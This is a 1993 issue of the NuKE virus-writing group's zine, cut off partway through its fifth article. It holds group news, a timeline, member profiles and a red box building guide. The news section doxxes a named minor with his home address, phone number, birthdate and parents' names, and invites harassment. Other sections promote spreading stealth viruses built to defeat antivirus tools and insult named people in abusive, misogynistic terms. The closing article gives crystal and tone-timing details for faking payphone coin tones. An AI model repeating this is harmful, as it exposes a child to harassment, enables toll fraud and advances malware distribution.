=========================================================================== NuKE Info Journal #5 ~~~~~~~~~~~~~~~~~~~~ March 13, 1993 ~~~~~~~~~~~~~~ Article Topics. ~~~~~~~~~~~~~~ 1. Halt! Who Goes There? (An Intro from Rock Steady) 2. State of 708 (An Intro from Nowhere Man) 3. NuKE Australia 4. NuKE TimeLine 5. DTMF Generator and Structural Design to Red & White Boxing 6. IBM 4700 Unix System, Why are these Bank System Popular? 7. An Intro to Red Boxing 8. McAfee 's ViruScan complete Virus signature listing 9. Viral Group? or Viral WareZ? 10. V.C.L. v2.0 Update 11. Data Encryption Standard 12. Disinfection on Fly, for your virus 13. Infection on Closing for your virus 14. Multipartite Viruses 15. Daemaen Virus 16. Sunday Telegraph Interview with Barbara Lewis 17. NuKE PoX v2.0 Sources 18. 1024 SBC Sources 19. Cyberculture 20. Truth on Gary Watson 21. Files Included in this Info Journal 22. Credits and Site Listing =========================================================================== =========================================================================== Who Goes There? - A Fast Intro ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Greetings, my fellow cipher-associated phreaks, and welcome to a fifth issue of our "Informational Journal" by NuKE associates, otherwise expressed as our "InfoJournal" for short. It has been perhaps a long while since our last InfoJournal; many thought we died out, as we had calls from our local AV (AntiVirus) community to check it out. I blame the long length on re-structuring, being new here I forgot I had an InfoJournal to produce, and lastly to them k0ol guys that want to take our butts and lock us up and throw away the key. "We're back!!!" The new InfoJournal has under gone new structural changes, the biggest being the bi-structural format: you can either execute the small 5k Hypertext file to read this like in our previous releases, or you can take out your favourite editor and read the (NK-INFO5.TXT) directly. Nevertheless I do hope you will execute the small 5k Hypertext file as it contains features that are not in the data file, and it does a CRC-32 checksum check on the data file to make sure it has not been tampered with. Anyhow this may be the LAST InfoJournal in Hypertext format. We may present a text-only file soon enough, as we intend to make the release dates a little more frequent; perhaps a monthly journal seems to be in our interests right now. New structural changes have been introduced into NuKE. I (Rock Steady) am perhaps the administrator of NuKE, as I play an active role in this dictating body, but nevertheless we also have other associates co-administrating NuKE with myself: Nowhere Man, Phrozen Doberman and Savage Beast are the other key-members, and we can not forget our latest additions, Screaming Radish and TäLöN. Our goal today is not a "perfect" group, nor do we wish to rule the scene, far from the truth. In a world that is so corrupt, we try to bring order and truth! The idea of creating "robots" to perhaps reach out and set an example that we cannot be stopped is amazing! Yes, we have created viruses beyond the scope of the narrow minded AV world -- in that we are in control, and if what me must do is discredit your software then by-darn-it we will. I hope to set an example with this organization we call "NuKE" -- we certainly DON'T think of NuKE a "just a" group. Normally a group is localized, but in our case the most powerful members are scattered on three different continents! Certainly we are not here to assimilate anyone, we simple wish to co-join ideologies. We call ourselves "anarchist." We suffer from injustice and repression brought upon us and every non-illiterate computer user by the AV world. With that we looked into our world, the sister world, the light of freedom in the dark night! Yes, we may be "underground" but our alienation gives us the upper hand over the AV world. We certainly know that our output perhaps will profit AVers and crush the small guys, but until the day comes that people understand that a piece of code is only code and not a biological hazard, our work is not done. All we wish to do is to simply to bring out the truth, nothing more, no conquering of the world, no destruction of computer networks, and certainly no one falling to our mercy for help. We give you what the butt-tight corporates hide from you. All we say is open your eyes, mature a little: Michelangelo will not cause every computer on the 6th day of March to die, rather it was more of a publicity stunt so that you will fill the AVers' pockets! One amazing case is if "Rock Steady" trades a virus with a buddy, this is this OUTLAWED, and we are pointed out to be the "Evil Hackers," but, if an AntiVirus person such as Frisk were to trade viruses with Joseph Greco, this is labelled as "the research of viruses." We, too, research our viruses, but we take an additional step forward -- we also research the AntiVirus products and label all of their flaws! But since we do that, the butt-tight corporate AntiVirus people label us as evil-doers. We are flesh just like yourselves. "Fame is really your WORST enemy." (Tormentor/DY) Perhaps the smartest quote I've seen, taken from my bud Tormentor, of Demoralized Youth. Nevertheless, I present to you this InfoJournal #5; apparently NuKE developed farther than ever expected! And we cannot mimic anyone as there is NO ONE to mimic. From here on NuKE is treading upon "unknown" territory, and you will see that in the articles presented here. The advances are "mind-boggling!" History is in the making! Rock Steady/NuKE =========================================================================== =========================================================================== The State of 708 ~~~~~~~~~~~~~~~~ Welcome to another exciting article detailing the triumphs and tribulations of everyone's favourite LATA, the 708/312 (Chicago) area. Since the last InfoJournal a few events have come up which deserve special attention, specifically the loss of two of the area's best boards, Ripco ][ and Nun-Beater's Anonymous, and changes at The Hell Pit. Read on for more details... Ripco -- R.I.P.? ~~~~~~~~~~~~~~~~ Perhaps the most famous board in this area is the legendary Ripco ][, a text/message-oriented board run by Dr. Ripco. Ripco, in service since December 1983, is the area's, perhaps even the nation's, most established underground board, and draws hundreds of users from all over North America and had a huge collection of historic text files. However, Ripco is probably best known for it's role in the Operation Sundevil crackdown of 1990, during which U.S. Secret Service agents broke into Dr. Ripco's apartment, detained him without cause, and seized all of his computer equipment, including the Ripco BBS. Due to complete lack of evidence, Dr. Ripco was set free, and Ripco went back up later that year with donated software and equipment. Now, in 1993, Ripco has suffered another blow. On January 21st, Dr. Ripco decided to change his hard disk controller; being a prudent man, he backed up all files first using FastBack Plus (this was the fatal mistake). After reformatting his drives, the new controller failed to work properly. When he did a restore, however, he was in for a nasty surprise -- Fastback had failed him, and nearly all of his files were unrecoverable. Luckily, the key system files and user logs were intact, but most of the file bases were gone forever. Dr. Ripco requests that if you have any of his old files, that you re-upload them to Ripco ][ (the number is +1-312-528-5020) or mail them to him at his post office box (Bruce Esquibel, P.O. Box 18169, Chicago, Illinois 60618, USA). Dr. Ripco says he'll be happy to reimburse you for disks and postage. I encourage everyone to chip in and support Ripco in another time of need. Then, on March 7, there was another shocking announcement at Ripco. The following are the highlights of the message that Dr. Ripco requested be passed on to the general public: "this is a bit difficult to do but it's got to be said. technically the board isn't closing and going away forever but some major changes are going to take place shortly and for all practical reasons, it probably isn't going to exist as you now know it. for about the last year, myself and several indivduals on the system have been toying with the idea of getting the system on internet. if you are not familar with internet, it's a world-wide network of computer systems which basically makes a 100 line 6 gig private bbs look like a c-64 running off one floppy. the problem however is public access to it. most of you that have used internet find out about that hard lesson sooner or later. chicago seems to be one of the few places in the area where public access is a challenge. i'd like to change that. ...to continue on with this project it has come to the point of dropping dos completely and switching the system over to UNIX completely. this means the program and the bbs as you see it will be dumped. not to keep your hopes up, what will be used to replace it will look like garbage initially. it'll be difficult to use and hard to figure out unless you have some prior UNIX experience. although i cannot be more specific on the new system at this time i do want to say that ripco ][ will be put into a suspended state, in case everything falls through and the project is abondoned, i promise to put things back to the way it was. so this isn't quite goodbye, just a vacation of sorts." -- Dr. Ripco So it seems for now that Ripco ][ is gone, at least for a while. As of the release of this InfoJournal, Ripco is still up, although file access has removed. Let's hope for the best... The Marty Zwikel Affair ~~~~~~~~~~~~~~~~~~~~~~~ In October 1992 a local loser named Repeat Offender (real name: Marty Zwikel) decided that, given the fact that had managed to actually talk to Rock Steady, he was a bonda-fide NuKE member. Before anyone was able to stop him, Marty decided to have a flame-war with Phalcon/SKISM over VX_NET. Marty made false accusations toward Phalcon/SKISM (which I will not repeat here), then accused GarbageHeap and Count Zero of lying to him, and falsely claimed that Rock Steady and myself supported his statements. He even had the audacity to add the NuKE signature after his name. Luckily cooler tempers prevailed, and everyone came to realize that he was just a local geek posing...he soon left the net, after complaints by all parties. For those of you who may be under the mistaken belief that "Repeat Offender" is in any way affiliated with NuKE (or ever was), THIS IS NOT TRUE. In actuality, Mr. Zwikel is a fourteen-year-old local fuck who tried to make the big leagues and made a fool of himself. Let's take a closer look at this asshole, shall we? Marty Zwikel is a 14-year-old male (we think) who's currently a freshman at Buffalo Grove high school in Northwest suburban Chicago, where he has earned the nickname "Adolf." Why, you might ask? A few classmates of his chose this because "he's a stupid computer geek who has no friends and everyone hates him and we think he'll grow up to be crazy and so we call him Adolf," they say. A year or so ago he ran a board called "No Bitches Allowed" under another handle; luckily this immature punk was taught a lesson by an irritated user (who chooses to remain anonymous) and No Bitches Allowed was successfully taken down. But Marty wouldn't learn. He brought his board back up as "The Altar," a K-RaD 0 WaREZ board and assumed the handle "The All Powerful." Then he caught the H/P/V craze (as has most of 708, ugh) and changed his handle to "Repeat Offender," after a lame Richard Marx album. Then he publically announced on Nun-Beater's Anonymous that he was starting a "secret crashing group" called Children of the Night, and immediately mailed me demanding to co-op with NuKE. When asked what his one-man group has actually done he said "I can't tell you which boards I've crashed because you might be friends with the sysops and get angry at me." (In other words, nothing.) Then came this incident over VX_NET. Now Marty has joined a local anti-Semitic crashing group which has been harassing and crashing boards all over the area. Will this kid ever learn? Marty Zwikel lives at 3906 Mitchel Drive in Arlington Heights, Illinois with his father, Dean, and his mother, Susan. Perhaps you'd like to speak to him voice...you can reach him at +1-708-506-1980. As previously mentioned, Marty was born on July 28, 1978 and has blighted the world ever since. Perhaps some of you will find this information useful. I sure have...hehehe. Nun-Beaters Goes Down ~~~~~~~~~~~~~~~~~~~~~ In early November 1992 Guido Sanchez, BLaH president and all-around wacky dude, took down Nun-Beaters Anonymous, his world-famous BBS, for undisclosed personal reasons. N.B.A., as it is known, was best known for it's zanny message bases, sysop access for first-time callers, and complete and total lack of sysop control. In fact the sysop actually encouraged people to leech entire file bases at one time, disabling all file restrictions for all users and adding a special "/LEECH" command just for that purpose. According to Guido, N.B.A. should be back sometime soon, but, although it might have a software change, will maintain it's free-wheeling tradition. "It should be back up this summer," says Guido. "Actually, I don't know when it'll be back up, so whenever you're bored put it in the re-dial queue and you might get lucky. The number is +1-708-251-5094. Kick the habit, call N.B.A. today!" As an interesting side-note, Nun-Beaters Anonymous was mentioned in Boardwatch Magazine (a print publication) for having an unusual name. "We don't even want to know," Boardwatch wrote. The strange thing about this is that N.B.A. had been down for four months when this was published. Changes at Hell Pit ~~~~~~~~~~~~~~~~~~~ The Hell Pit, NuKE's only active Chicago site, and perhaps Chicago's only remaining quality BBS, has been undergoing some changes recently which deserve mention here. First of all, Kato, one of the system's two sysops, has gone away to university, leaving Hades as the board's only acting sysop. All messages concerning the system should be addressed to him, *not* to Kato. Kato logs in very rarely, and only has time to read normal private mail. Hell Pit has also purged the user list recently of the many users who don't call regularly, don't do anything put leech, etc. This is in response to the growning scarcity of disk space (though there is talk of a disk upgrade) and the tremendous in-use time of the system. FidoNet was dropped due to lack of intrest, so now Hades is in the process of (finally!) adding NuKENET. Again, contrary to rumour, Hell Pit is *NOT* a fed board. This rumour continues to resurface from time to time, but is just as untrue as ever. The Hell Pit is still active, too; some people have speculated that it's down, since the line is always busy. That's normal, folks -- Hell Pit is in use perhaps 85% of the time. So set your modem to wardial and call The Hell Pit at +1-708-459-7267 today! Nowhere Man/NuKE =========================================================================== =========================================================================== IJ #5 Comments by Phrozen Doberman, NuKE Australian Rep ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Intro ~~~~~ When most people think of Australia, they remember a famous Australian movie, _Crocodile Dundee_. Some instantly assume that we shave with six-inch knives and keep crocodiles as pets. Maybe the feds do, but not we at NuKE. Yes, we have defiantly joined the group of countries which are endlessly advancing in computer systems technology. Before now, no-one had intended to put Australia on the map of countries where viruses are written. But time can not be separate from change, and changed we have. This year, three good .ASM coders from Australia joined NuKE in an effort to reach a common goal. Distance, race, religion and language put aside, they all put in their two-bits worth, so everyone could benefit (Frisk/McAfee _NoT_). But the year has just begun, and it looks like it will be one that we won't forget. 1992 was the year of development, the year of brainstorming and virus writing. 1993 is the time when we wrap our presents up, when the emphasis changes from mass writing to organized virus implementation. Gone are the days of the passive virus. The virus that runs, infects and destroys. Frisk/Tbave have put an end to that. Now, its _their_ turn. The active virus is here to stay, and it shall stay as long as we can keep it. As virus writers, we all know our direction needs to change. The user is no longer the ultimate target, now we are to aim at destroying every last piece of user confidence in Frisk/McAfee software. NuKE's philosophy has changed over time, and like any philosophy, it should be allowed to change. One must never under-estimate the power of experience and thus we have come to the believe that: By attacking computer users, we gain nothing and anti- virus vendors gain all, but by attacking anti-virus products, we not only inundate the anti-virus companies with more work, but destroy the users confidence in their programs. This is the philosophy that will put the fear into every anti-virus vendor, and now it is they who will have to face this reality. We realize what Frisk/McAfee _want_ us to do, to continue doing what we have in the past, but we know better than that. If there is one thing I would like to teach McAfee/Frisk it would be to show them that they aren't dealing with any bunch of smart kiddies, because now we will become as organized as them. One could consider such a result of this philosophy. For every user who loses confidence in Frisk/Mcafee and returns to NAV/CPAV, we are giving our future viruses a much better chance of survival. Frisk/McAfee deal the cards, they _have_ the support of the IBM PD world. NAV/CPAV receive the cards, thus they lack in keeping updated. This is what we need to exploit. I'm not going to sit here and make statements that I don't believe in. Nor could I be bothered using this introduction as some egotistical experience. I am here to tell you, the follower, onlooker, or participante of NuKE, that we are not just any underground group. I admit, I can't write a virus for shit. In fact, my role in NuKE has nothing to do with viruses. My best contribution to NuKE is in it's management. I can only tell you using the knowledge that I have learnt over time, that no matter how good your programmers are, no matter how good your tutorials are, no matter how good you can hack or crack F-prot/McAfee, it will be wasted if it's not implemented properly. I only want one thing from NuKE. I want to see the group reach its full potential. If I can help make the basis of a NuKE a platform more suitable for other experienced programmers to use, then that is what I aim to do. This is the year where NuKE will be reforming many of its practices. You are not just observing a group of highly skilled programmers, going about their work, but a group with a highly organized structure. Organization is the way NuKE will survive. It is how we can stop the Frisk/McAfee team beating us. It can help us in every way, shape and form, with beta-testing, virus distribution, info distribution, nukenet management, and most importantly, a single combined push for the active anti-Frisk/anti-McAfee virus code. This is not the time or place to start talking about NuKE-Net organization in depth. NuKE-CoNF will deal with that. What is NuKE-CoNF? In short, it is going to be a detailed system analysis of NuKE, so we can optimize our procedures, and not just make them into efficient ones, but the best. Anyone can contribute to NuKE-Conf, so long as you are a NuKE member or associate. VX/P-S associates may also contribute ideas. All submissions will be worked over, compared with other submissions, and modified if necessary. Unfortunatly, NuKE can not guarantee that results of NuKE Conf will be published. Before I continue, I make one pledge to all those reading this. If we, as virus writers, want to archive our goals, then we need to work together. We need to understand our weaknesses and our strengths, and improve our systems where possible, for any group which can do this does not just exist as a magnetic particle on a hard disk somewhere on someone's computer but continues to succeed with the spirit of every participating member, the spirit of NuKE. Thank You. Phrozen Doberman Melbourne, Australia 22nd February, 1993 New Info ~~~~~~~~ I am now beta-testing a Tic File Distribution link between myself and Screaming Radish. It seems to be working fine, and if implemented, all members will benefit. First, however, let me explain what "TiC" is all about. "TiC" of TDF (Tick File Distribution) as we will refer to it is a way in which NuKENET BBS's can transfer files between each other in a very simple an automatic way. "TiC" will attach a hatched file (that is, a file you intend *everyone* to have, ie: InfoJournals) to your Front Door, D'Bridge or similar Fido-standard-compatibile mail handler. A quick example: Rock Steady wants to release a new virus, but he wants to make sure everyone gets it. He places a .ZIPped copy of the viruses kernel in a special area where his "TiC" processor (ie: FileMgr) will identify this virus as a new file to be hatched. His "TiC" processor then determines what systems are in the export list, and attaches this file (as a netmail file attach) to each node in the export list, along with a file with an extension ending in .TIC. Inside this .TIC file, is the file areas name, a description and seen-by's. I suggest that the following areas are set up: VIRUS_BETA = Internal beta-testing viruses. Never to be released. Only for members. All bugs reports via NuKENET. VIRUS_FINAL = Final kernels of viruses. _MUST_ have been beta-tested. Not for release to the general public. VIRUS_INFECT = Infected programs with the virus so we may under "beta-testers." VIRUS_SOURCE = All virus source. VIRUS_EXTRA = Odd things. Including IJ's. All comments, via NuKENET please. New Memberz ~~~~~~~~~~~ I'd like to announce the following new NuKE members: Screaming Radish - NuKE Aust. Vice Rep Shindaq Arl'hur - Member The Wierd One - Member TäLöN - Member Left Memberz ~~~~~~~~~~~~ I'd like to announce the following memberz have left: Lord Venom and Screaming Jesus The Pit BBS is *NO LONGER* a NuKE support BBS. Memberz Analysis ~~~~~~~~~~~~~~~~ Although there existed a stage where I was the only NuKE Australian member, the festive season has brought many a virus writer out of the closet. The three new members, S.R., Shindaq and TäLöN, all have previous experience with writing viruses. Screaming Radish: is extremely skilled in stealth and memory ~~~~~~~~~~~~~~~~ addressing techniques, saying such a statement is like saying the E=MC² was an okay formula. SR is MC², SR has abilities never dreamed about. You have a problem SR will get you a solution! We hated that memory loss in TSR Viruses, so SR got us a routine to steal buffers from DOS, and used those as allocating a virus! As DOS buffers are about 512 bytes each, stealing 3-4 will result in no harm to the system and NO MEMORY CHANGE AT ALL! Amazing! And we laughed at Proto-T? And the list goes on... Shindaq: Has been disabling viruses for a few years, and specializes ~~~~~~~ in dropper-type viruses. He has also written a dropper-type virus from scratch. TäLöN: Has been a virus writer for years, here's his background, in his ~~~~~ own words: "Hi there, I am typing to you from the Newcastle, New South Wales, Australia. I am not new to the virus scene, in fact I was a member of the puppet group [PuKE]. Just a quick background on PuKE: it was set up about a year ago by Harry McBungus (who wrote X-Fungus, No Frills 2.0 and No Frills 3.0, all unremarkable) simply as a stuff-around, paying out on NuKE. Harry saw NuKE getting large egos over large, non-resident direct-action viruses: in other words he though they were idiots. Hence, PuKE endeavoured to write things which compared to NuKE WareZ but on a far smaller code scale. The fruits of Harry's labours were 'stolen' by myself, however, and that is how they grew in the wild; otherwise they would not be around. Although PuKE disliked NuKE, everything grows in stages, people mature, and since then NuKE has evolved into the best Power Virus Group in the world. (As a side note, Harry left the scene in around June 1992, as a result of something called a Fraud squad. Good luck to Harry in whatever he is now doing.) I, TäLöN, defected to NuKE shortly after writing the Dudly virus (also known as No Frills 4.0 and V2P6Z Mark 2, which was stolen off me by someone hacking into my board. I had no intention of releasing it into the wild. It's unremarkable besides its lame polymorphism, which is similar to V2P6 in end result, not generation) I have not added anything to the virus scene since the writing of Dudley-1, but grew active a month ago with the creation of another, yet-to-be-named virus, namely a 3k COM/EXE/SYS/BIN/OVL/MBR/BS infecting, polymorphic stealth virus. It hides partition infection; it hides file size increase on directory; it infects boot sectors of ANY floppy format, current or future, on read/write access; it infects hard disk partition on infected disk boot or infected file execution on virgin system, and so on. One mother of a virus. However, I have taken great care not to make it destructive in anyway, so no stupid AV researcher can point the finger spin the typical anti-virus rhetoric, 'Bad virus, bad virus, didn't you know every virus will destroy precious hours of work.' My opinions on AV researchers in general is very low. I take great pride in totally debunking their theories and stereotypes. I am NOT a social recluse. I do not have a sunken chest, nor am I fat or a cowardly insignificance. I possess a fair degree of common sense. I do not go out of my way to trash boards or computers; in fact I steer away from such things. Furthermore, I do not view virus writing or the discussion of viruses a taboo subject. Most of all I do not try to keep the public in the dark about what viruses can and cannot do. Harry McBungus shared basically the same views but when he tried to speak out and 'educate' the public, he instead got nailed by the press. (The media is another of my pet hates.) Anyway I have lost patience with hierarchy and bureaucracy... and the media, the government and the public can basically suck John McAfee's dick while he laughs all the way to the bank. We have provided and income for John for long enough, it's time to make SCAN look like the total crock of shit that it has always been. Before I leave, just a few quick hi's, ho's and 'thanks' to: John McAfee: Fuck You Patricia 'It is unknown what this virus does besides replicate' Hoffman: How about you get a clue before you make out you're the big-wig virus analyzer. VSUM is the biggest farce since ViruScan itself. Sara Gordon: for all the laughs your ridiculous psychological theories about virus writers gave me. Try a bit harder. Matt: for all the cool times we had. The legend of the 50-cent piss-up will never leave my memory banks. Pantera, Metallica: for providing an awesome soundtrack for virus development! and to NuKE for making everything possible. TäLöN/NuKE" All in all, you will be seeing a lot more from NuKE Australia this year. We have refocused on the job, have a brand-new line up (new blood rarely does harm) and we have a direct vision for the future. All of this would be hard to archive without the coherence, unity and strength of NuKE! Final Note ~~~~~~~~~~ Here is where you all get your compliments! A big thanks to Rock Steady, for keeping the NET alive. Overall, he has managed NuKENET in the best way possible, and this does deserve some positive feedback. I would also like to thank him for all the charges he has incurred while keeping the NuKENET link alive! Yes, NuKENET pays for its calls. No illegal crap in our camp! Secondly, I would like to thank Nowhere Man for supplying us with beta versions of NED, Screaming Radish for helping me when I needed suggestions and technical advice, Shindaq for keeping the BBS alive, TäLöN for helping out and keeping your cool, and last but not least, Savage Beast for keeping an excellent database of viruses. Hubbada, Hubbada, and good virus writing to you all.... Please address all correspondence to: Phrozen Doberman,111:950/3@Nuke_NET Phrozen Doberman/NuKE =========================================================================== =========================================================================== A NuKE Timeline ~~~~~~~~~~~~~~~ -------------------------------------------------------------------------- October 1992 NED (NuKE Encryption Device) is completed, an encryption engine that is very simple to use, yet overcomes all of the "flaws" of MtE to become perhaps the wildest engine out, with an ability to understand code and compile its very own code. Amazing. VCL v2.0 will "field test" the success of this NuKE product by Nowhere Man. -------------------------------------------------------------------------- November 1992 NuKE-PoX Virus version 2.0 noted as a common North-American virus in VSUM. -------------------------------------------------------------------------- November 1992 NuKENET joins with VX_NET from ARiSToLE's board. -------------------------------------------------------------------------- November 1992 NuKENET is extended not only to Australia, but, with the help of Savage Beast, is also expanded to Europe. Demoralized Youth of Sweden gets on NuKENet, along with other supporting countries like the Netherlands, Switzerland, and Bulgaria. -------------------------------------------------------------------------- November 1992 NuKE encounters "Death Angel" of Toronto, the virus programmer of the original ONTARIO-512 and ONTARIO-1024 (aka 1024-SBC). Death Angel made himself a NuKE supporter. In our InfoJournal #3 we dissassmbled the Ontario-512 virus, and as a result the Ontario-730 was derived from it (which was NOT programmed by Death Angel!). Both viruses got listed as common viruses in North America! Death Angel also gave us his original source of Ontario-512 and -1024 (which we enclude in this issue). -------------------------------------------------------------------------- December 1992 Screaming Radish joins up with the NuKE Team. His abilities with the 80x86 are mind-boggling and is known for the best all-nighters that I've ever seen... Even though relations with Screaming Radish go "WAY-BACK" (he was considered part of us for a while), only NOW did Screaming Radish officially join NuKE by being completing his "test-of-NuKEhood" in the Australian outback, and as a proven hacker he succeeded in hiding his tracks and killing the Bushmen and crocodiles on his tail... [What can I say, it's tough to become a Aussie-NuKEer! :-)] -------------------------------------------------------------------------- January 10th, 1993 TäLöN enough respect goes out to this charm... He too has succeeded the wild-bush hunt of the Aussie, though he was never the same afterward... Just as Compton was put on the map by the Brothers, TäLöN is the one to put Aussie onto the map. For that I gave him a whole paragraph in this intro... -------------------------------------------------------------------------- January 10th, 1993 Paul Ferguson thinks he's an amazing god with connections (for the local strawberry club) since he knows how to use Directory Assistance and called NuKE up! Big-ol' Pauly cried on our shoulders that [and we quote] "ITS A POLYMORPHIC WAR OUT THERE! (sob, cough, snort)" Huh? Paul got a copy of TPE. (Yeah right! He heard of it and wanted to know if we had it!). All in all Paul showed himself to be a powerful man, with very powerful friends, and was able to prove that he was THE god being able to crush us with a snap of his fingers. For this NuKE awarded Paul with the NuKE Wanker of the Year award. It's the FIRST time NuKE presented such an award, so we named it after Paul, therefore with respect we now call it... "The NuKE Big-Ol' Paul Ferguson Wanker Award" We were going to send him a picture of a horse's ass and sign it, but we figured a mirror will be pretty much be the same, but cheaper... -------------------------------------------------------------------------- January 24th, 1993 Daemaen Virus created by TäLöN. This virus will infect ANYTHING that moves. It will infect .EXEs, COMs, OV?s, SYSs, BINs, floppy boot sectors, and HD partition tables. It also contains a dir-stealth routine, and will infect files on open, creation, close, browsing, attribute functions, you name it... A very fast, extremely fast infector. Its features will be embedded inside VCL v2.0, coming soon in a computer near you... -------------------------------------------------------------------------- February 1993 The Weird One and Shindaq Arl'hur have joined the NuKE team. Their abilities are also well spoken of, being amazing guys and an asset to the Team. (Though it'd be cooler it they talked a little more...) Hiya' Guys! -------------------------------------------------------------------------- February 1993 The Dark Elf Virus, by Shindaq Arl'hur, comes alive. It is another multipartite virus that infects boot sectors and HD Partition as well as .EXE and .COM files. With stealth boot abilities it too will have its features embedded inside VCL v2.0. -------------------------------------------------------------------------- February 2nd, 1993 Rock Steady goes to the local post office and mails two letters to two NuKE members whom will remain unknown (Phrozen Doberman and TäLöN) and yet where did the letters end up? [Thanks for telling me you got 'em! NOT!] -------------------------------------------------------------------------- February 8th, 1993 ARCV of England gets busted BIG-TIME. Apache Warrior and his followers are charged with computer fraud for the purpose of causing damage with self-replicating code (viruses). England flips, and the nation of n0-Crimez wonders how to control this loop in the hole. An "example" is supposed to be made of the group to scare others from repeating their actions! -------------------------------------------------------------------------- February 15th, 1993 Barbara Lewis from the English newpaper _Sunday Telegraph_ calls up NuKE for a one-on-one interview. The bitch got nothing, as we've already visited Compton. But she pulled a strawberry act on us -- yup, she gave us her number, and now NuKE and Barbara got a hot "soap-opera" relation going! Our favourite "girlfriend-boyfriend" saying is "Bitch, get off my wanker!" -------------------------------------------------------------------------- March 1st, 1993 Rock Steady had a vision of releasing the NuKE InfoJournal today, but federal officers thought otherwise... [BiTE Me] -------------------------------------------------------------------------- March 12th, 1993 After visiting Compton, Rock Steady had the sudden urge to rap out the words to the song "Fuck Tha Police" by NWA while entering the station with a logo "Blow away the pigs" embedded on his t-shirt, visiting his parole officer... -------------------------------------------------------------------------- =========================================================================== =========================================================================== DTMF Generators, White Boxing, and Red Boxing ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ I've seen before me way too many fabrications of red boxes; the H/P community enjoys to talk about it a lot, and fantasize about its abilities. But seldom do I see an accurate example of any box construction. Perhaps I'm simply in the wrong circle? Nevertheless I did a little research on the actual structure of an DTMF Generator and on how to convert this into a red and white Box. 2600 Enterprises did have the BEST red box example to pass before me, however in Canada legislation differs quite a lot, and any kit or package that can be hacked is not tolerated; so therefore the famous Radio-Shack Pocket Dialer is not available here, and I would say many other places, such as Europe or Australia, where Radio Shack is not as widely established as in the USA. Our Radio Shacks are no bigger than a local corner candy store, and the only useful products they sell are calculators. Pathetic is the scene I run into everywhere I go in lovely Canada. So since the Radio-Shack Pocket Dialer WITH MEMORY is not available I guess we must build the actual device from scratch. It's fairly simple, and I've already succeeded in building the DTMF Generator. It's very easy -- it consists of one IC, a crystal to control the oscillator (in the IC) and a key-pad. The construction of the DTMF Tone Generator is perhaps the hardest part of this project, and yet that is quite fairly simple. Anyhow this project does require you to know the basics of kit building, and hopefully you know how to use a soldering iron, as you will need to solder the IC and Crystal onto a simple board. Now the DTMF tones are generated internally inside the IC, but the timing depends on an external crystal oscillator. And the only external component we have is the 3.579545 MHz crystal: right here we have a "white box," as a white box is suppose to generate the DTMF "Touch-Tone" tones. Now if we replaced the 3.579545 MHz crystal with an 6.5536 MHz one, our "*" key on the key-pad will actually be DARN close to 3900 Hertz, the EXACT frequency that a coin stimulates when being entered inside the pay- phone. So in reality instead of putting $0.25 you can put theses tones on the mouth piece and fool the Bell System. Brief Operation ~~~~~~~~~~~~~~~ When entering a $0.25 into a payphone the only way the phone company knows that you entered money by a tone which consists of a 700 Hz + 2200 Hz (3900 Hz) being flushed into the line. For quarter you will need 3900 Hz for 35ms in length and a pause for 35ms and then 3900hz for 35ms then a pause...etc. This must be produced exactly FIVE times, so you should have five tones of 3900hz of 35ms with pauses of 35ms between each. Our DTMF generator contains a ten-number memory. When we save a number into the DTMF memory and replay it, the redial timing will play the tone for 72.3ms and pause for 72.3ms before going to the next tone and playing that for 72.3ms! Now the tones will be played at this speed ONLY with the 3.579545 MHz crystal, as the crystal controls ALL LOGIC and TONE GENERATING TIMING! So when this is replaced with a 6.5535 Mhz crystal it naturally will be alot faster and the timing will be faster. As a matter of fact the timing is NOW 34.3ms! So anything redialled by the DTMF generator will come out at 34.3ms and a pause for 34.3ms. Our "*" key will also sound very close to the 700 + 2200 Hz, and therefore saving "*" 5 times in a memory and redialling it will result into sounding like a $0.25, all one has to do is put red box to the payphone mouth piece and the phone system will think you entered a valid $0.25. _____________________ / General Description \____________________________________________________ Features ~~~~~~~~ ■ 2.5V-12V operation when generating tones, which is A LOT less voltage needed, compared to several white boxes I've seen which ask for 16V-24V. ■ Stores and auto-dials ten 16-digit numbers. ■ Last number redial. ■ Scratchpad, meaning number storage without dialling. ■ 14 Keys, separate storage and redial buttons. ■ 2-digit overwrite for PBX access codes. ■ Low harmonic distortion. ■ Single-contact or negative-common (2-of-8) key-pad inputs. Well, before we begin I must say that replacing the 3.57545 Mhz crystal with an 6.5536 will give us the 3900 Hertz tone ONLY by the "*" key. With this information the same is true for any key, on the keypad! In fact my calculations proved that in order to get an EXACT 3900 Hertz by the "*" key we would need a crystal of about 6.4857 Mhz. However chances of production of an 6.4857 Mhz crystal is asking for a little too much, so naturally we settle for the closest one possible to it; besides analog signals are quite difficult to simulate exactly, compared to digital, which is always exact! This IC is from "National Semiconductor Corporation" model number TP5660. Perhaps even the exact IC in the Radio-Shack Pocket Dialer with Memory, as the one without memory uses the TP5650 which is this exact IC but without memory! The Operating temperature is -30°C to +60°C. This IC looks like so: 1┌─────┬──┬──────┐16 Vdd──┤ └──┘ ├───TONE OUT 2│ National │15 Vm──┤ Semiconductor ├───Row 5 3│ (Linear │14 Col 1──┤ Databook) ├───Row 1 4│ │13 Col 2──┤ ├───Row 2 5│ TP5660 │12 Col 3──┤ ├───Row 3 6│ │11 Vss──┤ ├───Row 4 7│ │10 ┌─────────────────OSC─IN──┤ ├───MUTE OUT ┬┴┬ 3.579545 Mhz Crystal 8│ │9 ┴┬┴ Control OSC. ┌OSC─OUT──┤ ├───Col 4 └───────────────┘ └───────────────┘  Replace above with the below to have both Red & White Boxes in one. ┌───┬──── ┬┴┬ ┬┴┬  3.579545 Mhz ┴┬┴ ┴┬┴ └ │ ┘  If you put a two-way switch you can switch from crystal,  └────── to crystal, and you'll have a red and white (combo) box! Your new crystal should be 6.5536 for "*" Key Pin Description ~~~~~~~~~~~~~~~ Vdd (Pin 1): The positive supply to the device, referenced to Vss. A power-on reset circuit ensures correct operation following initial power-up. Vm (Pin 2): The negative terminal of the back-up battery for on-hook memory retention. A low-voltage detect circuit prevents missoperation of the circuit in the event of a reduction in the on-hook supply voltage below that required to retain stored data. COLUMN & ROW Scans (Pins 3, 4, 5, 9, 11, 12, 13, 14, 15): When no key is closed, pull-up resistors are active on COLUMN inputs and pull-down resistors are active on ROW inputs. Therefore after a key is pressed the ROW pull-down resistors cause a negative-true on COLUMN inputs (for standard telephone key-pads negative-common). Vss (pin 6): The negative supply to the device in the off-hook state. OSC IN, OSC OUT (pin 7, 8): All logic and tone generator timing is derived from the on-chip 